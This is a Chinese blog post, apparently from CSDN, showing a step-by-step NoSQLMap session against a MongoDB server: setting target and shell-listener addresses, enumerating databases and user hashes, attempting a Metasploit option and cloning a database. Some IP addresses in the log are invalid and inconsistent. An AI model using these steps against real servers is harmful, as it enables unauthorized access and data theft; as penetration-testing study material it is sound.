nosqlMap操作demo

最新推荐文章于 2024-08-12 08:33:09 发布
最新推荐文章于 2024-08-12 08:33:09 发布
阅读量3.3k 收藏
点赞数 1
分类专栏: python3 文章标签: python nosqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq116165600/article/details/84957994
版权

今天使用nosqlMap对mongoDB进行攻击测试,网上虽然有很多的例子,但是都只是下载的地方,没有具体的操作日志,现在就贴上操作日志,告知一步一步怎么操作的,

1.先下载nosqlMap python开源代码吧,下载地址:-https://github.com/codingo/NoSQLMap

不过这里下载的python code版本是2.7版本的 所以得注意 若用的3.X版本的python 得修改部分的语法,比如print(),row_input得修改为input函数即可,其他缺少第三方库的就自己添加吧,若是2.X版本的python则不需要修改

2.最终的python代码结构如下:

3.启动python  使用python nosqlmap.py即可启动,Linux和windows的操作一样

4.最终 贴上启动成功 及后续的操作日志,首次使用的人就跟着一步一步的使用吧

D:\python\python.exe F:/nosqlMap/nosqlMap/NoSQLMap-master/nosqlmap.py
'clear' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���
 _  _     ___  ___  _    __  __           
| \| |___/ __|/ _ \| |  |  \/  |__ _ _ __ 
| .` / _ \__ \ (_) | |__| |\/| / _` | '_ \
|_|\_\___/___/\__\_\____|_|  |_\__,_| .__/
 v0.7 codingo@protonmail.com        |_|   


1-Set options
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
5-Change Platform (Current: MongoDB)
x-Exit
Select an option: 1



Options
1-Set target host/IP (Current: Not Set)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: Not Set)
8-Set shell listener port (Current: Not Set)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu

<!--1.这里是第一次操作 选择了option1 --!>

Select an option: 1
Enter the host IP/DNS name: 172.17.202.441

Target set to 172.17.202.441




Options
1-Set target host/IP (Current: 172.17.202.441)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: Not Set)
8-Set shell listener port (Current: Not Set)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu


<!--1.这里是第二次操作 选择了option1 --!>

Select an option: 7
Enter the host IP for my MongoDB/Shells: 172.17.202.4111

Shell/DB listener set to 172.17.202.4111




Options
1-Set target host/IP (Current: 172.17.202.4411)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: 172.17.202.4111)
8-Set shell listener port (Current: Not Set)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu

<!--1.这里是第三次操作 选择了option1 --!>

Select an option: 8
Enter TCP listener for shells: 80
Shell TCP listener set to 80




Options
1-Set target host/IP (Current: 172.17.202.4411)
2-Set web app port (Current: 80)
3-Set App Path (Current: Not Set)
4-Toggle HTTPS (Current: OFF)
5-Set MongoDB Port (Current : 27017)
6-Set HTTP Request Method (GET/POST) (Current: GET)
7-Set my local MongoDB/Shell IP (Current: 172.17.202.411)
8-Set shell listener port (Current: 80)
9-Toggle Verbose Mode: (Current: OFF)
0-Load options file
a-Load options from saved Burp request
b-Save options file
h-Set headers
x-Back to main menu

<!--1.这里是第四次操作 选择了option1 --!>
Select an option: x
'clear' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���
 _  _     ___  ___  _    __  __           
| \| |___/ __|/ _ \| |  |  \/  |__ _ _ __ 
| .` / _ \__ \ (_) | |__| |\/| / _` | '_ \
|_|\_\___/___/\__\_\____|_|  |_\__,_| .__/
 v0.7 codingo@protonmail.com        |_|   


1-Set options
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
5-Change Platform (Current: MongoDB)
x-Exit

<!--1.这里是第五次操作  --!>
Select an option: 2
DB Access attacks (MongoDB)
=================
Checking to see if credentials are needed...
Successful access with no credentials!
MongoDB web management closed or requires authentication.


1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu

<!--1.这里是第六次操作 --!>
Select an attack: 1


Server Info:
MongoDB Version: 3.0.7
Debugs enabled : False
Platform: 64 bit




1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu
Select an attack: 2


List of databases:
admin
XXX
XXX
XXX
XXX
test


List of collections:
admin:
system.indexes
system.version
system.users
fs.chunks
fs.files


Database Users and Password Hashes:
Username: appAdmin
'pwdXXXXXX'
Error:  Couldn't list collections.  The provided credentials may not have rights.




1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu

<!--1.这里是第七次操作 --!>
Select an attack: 3


GridFS enabled on database admin
 list of files:

GridFS enabled on database cornerstone
 list of files:

GridFS enabled on database CPM
 list of files:

GridFS enabled on database FileDB
 list of files:

GridFS enabled on database local
 list of files:

GridFS enabled on database test
 list of files:



1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu

<!--1.这里是第八次操作 --!>
Select an attack: 5


Something went wrong.  Make sure Metasploit is installed and path is set, and all options are defined.
Press enter to continue...


1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu

<!--1.这里是第九次操作 --!>
Select an attack: 4


1-admin
2-XXX
3-XXX
4-XXX
5-XXX
6-test
Select a database to steal: 6
Does this database require credentials (y/n)? n
Something went wrong.  Are you sure your MongoDB is running and options are set? Press enter to return...


1-Get Server Version and Platform
2-Enumerate Databases/Collections/Users
3-Check for GridFS
4-Clone a Database
5-Launch Metasploit Exploit for Mongo < 2.2.4
6-Return to Main Menu

<!--1.这里是第十次操作 --!>
Select an attack: 4


1-admin
2-XXX
3-XXX
4-XXX
5-XXX
6-test
Select a database to steal: 6
Does this database require credentials (y/n)? n
<!--最终操作成功 --!>
Database cloned.  Copy another (y/n)?

 

停车枫林有点晚
关注
专栏目录
NoSQLMap:自动化的NoSQL数据库枚举和Web应用程序开发工具
02-02
NoSQLMap NoSQLMap是一个开放源代码Python工具,旨在对NoSQL数据库和Web应用程序中的NoSQL数据库和Web应用程序进行审计以及自动注入攻击,并利用它们的默认配置弱点,以便从数据库中公开或克隆数据。 最初由,现在由维护,以表彰Bernardo Damele和Miroslav的Stampar广受欢迎SQL注入工具 。 它的概念基于Ming Chow在Defcon 21上的出色演讲扩展。 NoSQLMap MongoDB管理攻击演示。 屏幕截图 概要 什么是NoSQLNoSQL(最初指的是“非SQL”,“非关系”或“不仅是SQL”)数据库提供了一种存储和检索数据的机制,该机制以与关系数据库中使用的表格关系不同的方式建模。 这样的数据库自1960年代后期就已经存在,但是直到二十世纪初,由于诸如Facebook,Google和Amazon.com之类的Web 2.0公司的需求激增,才获得“ NoSQL”的美誉。 NoSQL数据库越来越多地用于大数据和实时Web应用程序中。 NoSQL系统有时也称为“不仅SQL”,以强调它们可能支持类似SQL的查询语言。 DB
最受欢迎的十款SQL注入工具
2301_77472496的博客
08-28 5292
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~《网络安全入门+进阶学习资源包》CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享网络安全源码合集+工具包​​。
NoSQLMap 开源项目使用教程
最新发布
gitblog_00857的博客
08-12 388
NoSQLMap 开源项目使用教程 NoSQLMapAutomated NoSQL database enumeration and web application exploitation tool.项目地址:https://gitcode.com/gh_mirrors/no/NoSQLMap 1. 项目的目录结构及介绍 NoSQLMap 项目的目录结构如下: NoSQLMap/ ├── do...
探索技术新星:NoSQLMap - 网络安全的得力助手
gitblog_00035的博客
03-23 394
探索技术新星:NoSQLMap - 网络安全的得力助手 NoSQLMapAutomated NoSQL database enumeration and web application exploitation tool.项目地址:https://gitcode.com/gh_mirrors/no/NoSQLMap 在网络安全领域,有一种工具能够帮助我们检测和利用NoSQL数据库的漏洞,那就是。...
渗透测试之地基服务篇:服务攻防之数据库Mongodb(下)
xnxqwzy的博客
07-31 352
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
Tools: NOSQLMap - SQLMap for nosql database
cnbird's blog
12-12 1309
What is NoSQLMap? NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases, as well as web
pcsc读卡器操作Demo
04-08
pcsc读卡器操作Demo
java FTP操作demo
01-03
javaFTP目录、文件操作
android串口操作Demo
05-31
这个"android串口操作Demo"是针对Android Studio环境设计的一个实例,它演示了如何在Android设备上实现串口通信,实现数据的自发自收功能。通过分析这个Demo,我们可以深入了解Android串口通信的基本原理和实现步骤...
基于SpringBoot 操作redis Demo
07-07
下载导入即可使用,基于SpringBoot 构建redis操作demo。 redis支持数据类型(可自行测试): String: 字符串 Hash: 散列 List: 列表 Set: 集合 Sorted Set: 有序集合 提供操作类,将数据缓存至service并设置过期时间...
NoSQL自动攻击测试工具NoSQLMap.zip
07-19
NoSQLMap是一款开源Python工具,可以帮助安全测试人员自动化对NoSQL数据库进行攻击测试。目前这款工具的漏洞利用程序围绕MongoDB,但是以后会支持更多的NoSQL数据库,如 CouchDB, Redis和Cassandra。NoSQLMap是一款Python编写的开源工具,常用于审计NoSQL数据库中的自动注入攻击、为了从数据库中揭露数据而利用NoSQL数据库或使用NoSQL的Web应用的默认配置弱点。它这样命名是为了几年Bernardo Damele和Miroslav创作的流行的SQL工具SQLmap,它的设计理念来源于Ming Chow在Defcon中发表的很棒的演讲-”Abusing NoSQL Databases”。该工具目前主要应用于MongoDB,但是它在未来的版本中还会支持其他基于NoSQL的平台,如CouchDB, Redis和Cassandra等。当前该项目的目的是为简单攻击MongoDB服务器和一些web应用提供渗透测试工具,以及用通过概念攻击来证明某NoSQL应用不会受到SQL注入。主要功能:自动化MongoDB和CouchDB数据库枚举和克隆攻击。通过MongoDB web应用提取数据库名称、用户和哈希密码。为使用默认访问和枚举版本的MongoDB和CouchDB数据库扫描子网或IP列表。字典攻击、暴力破解恢复的MongoDB和CouchDB的哈希密码。针对MongoClient的PHP应用程序参数注入攻击,返回所有数据库中的记录。Javascript函数变量转移和任意代码注入,返回所有数据库中的记录。类似于盲SQL注入的用于验证无来自应用程序的反馈的Javascript注入漏洞的时序攻击。使用方法启动./nosqlmap.py或python nosqlmap.py.基本菜单1-Set options (do this first) 2-NoSQL DB Access Attacks 3-NoSQL Web App attacks 4-Exit 标签:NoSQLMap
C# 操作 MongoDB的示例demo
01-19
今项目使用Mongodb,C#操作MongoDB使用MongoDB.Driver.dll库(Nuget),写了个小Demo,如下: using System; using System.Collections.Generic; using System.Linq; using System.Linq.Expressions; using System....
qt数据库操作demo
08-08
qt数据库操作demo,对用户名进行增、删、改、查,添加pri后可以直接使用,编译运行正常,功能操作正常
krpano 基本操作demo
12-09
krpano 基本操作demo 如何在全景图上写一下自定义的东西?比如导航栏 添加按钮,添加图层,通过热点跳转某个场景,如何进行自动浏览,如何与js进行交互 博客地址:...
Java Socket 操作 Demo
03-29
Java Socket 操作 Demo import java.awt.Color; import java.awt.Dimension; import java.awt.Point; import java.awt.event.KeyAdapter; import java.awt.event.KeyEvent; import java.io.BufferedReader; import ...
sqlmap初级
qq_27396789的博客
11-23 291
1 三种方式get、post、cookiegetmysql -u "url"postmysql -u "url" --data "username=ly"cookiemysql -u "url" --cookie "a=cookie_a"2 获取当前数据库、用户、权限、数据量数据库mysql -u "url" --current-db用户mysql -u "url" --current-user权限
git commit 报错:‘“node“‘ ��ڲ����ⲿ���Ҳ���ǿ����еij����husky - pre-commit hook exited with code 1 (error)
weixin_44995347的博客
05-04 4180
在git commit 代码到远程仓库时,出现了上面的错误,我的解决方法为:在项目目录命令行执行下面命令 git commit --no-verify -m 'xxxxxxxx',其中,‘xxxxx’代表执行git commit 中💥 feat(compiler): add 'comments' option的add 'comments' option,即所提交内容的简要说明。然后直接push就行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值